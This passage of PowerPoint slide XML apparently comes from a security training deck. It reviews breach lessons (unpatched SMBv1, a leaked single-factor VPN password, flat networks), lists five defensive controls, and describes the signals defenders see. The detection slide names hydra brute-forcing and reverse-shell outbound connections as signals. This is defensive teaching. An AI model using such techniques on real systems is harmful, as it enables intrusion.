                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SMBv1 on 445 with a two month old patch missing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A VPN login with one factor and a leaked password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Both are things you would find in the first hour of an engagement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="1536192"/>
            <a:ext cx="3593592" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="1737360"/>
            <a:ext cx="3063240" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Nobody was watching the boring signals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="2606040"/>
            <a:ext cx="3108960" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Mass connection attempts to 445 across a whole subnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A login from an account that had not been used in months</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Both look obvious in a log file, afterwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8138160" y="1536192"/>
            <a:ext cx="3593592" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="1737360"/>
            <a:ext cx="3063240" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The blast radius was a design choice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="2606040"/>
            <a:ext cx="3108960" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Flat networks let the worm reach everything</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>IT and operational networks that touch each other</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Segmentation is what turns a breach into an incident instead of a disaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5029200"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>THE FIVE CONTROLS THAT WOULD HAVE STOPPED BOTH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5394960"/>
            <a:ext cx="11064240" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>patch on a schedule    ·    MFA everywhere    ·    remove unused accounts    ·    segment the network    ·    read your logs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5943600"/>
            <a:ext cx="11064240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>None of it is exotic, and all of it is what your report should be asking for.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="135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08 / WRAP UP</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What the defender saw today</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58</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_blue.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="6675120" cy="3145536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="1554480"/>
            <a:ext cx="4087368" cy="3108960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scans are trivially visible. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A single host touching 65535 ports is not something a normal workstation does.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Failed logins are counted. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Your hydra run is a spike no analyst will miss.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Reverse shells stand out. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A database server making an outbound connection to a random port is the alert you want to trigger, as a defender.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>You will do this side too. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Blue and red are the same knowledge read in opposite directions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4892040"/>
            <a:ext cx="11091672" cy="1188720"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5074920"/>
            <a:ext cx="10515600" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
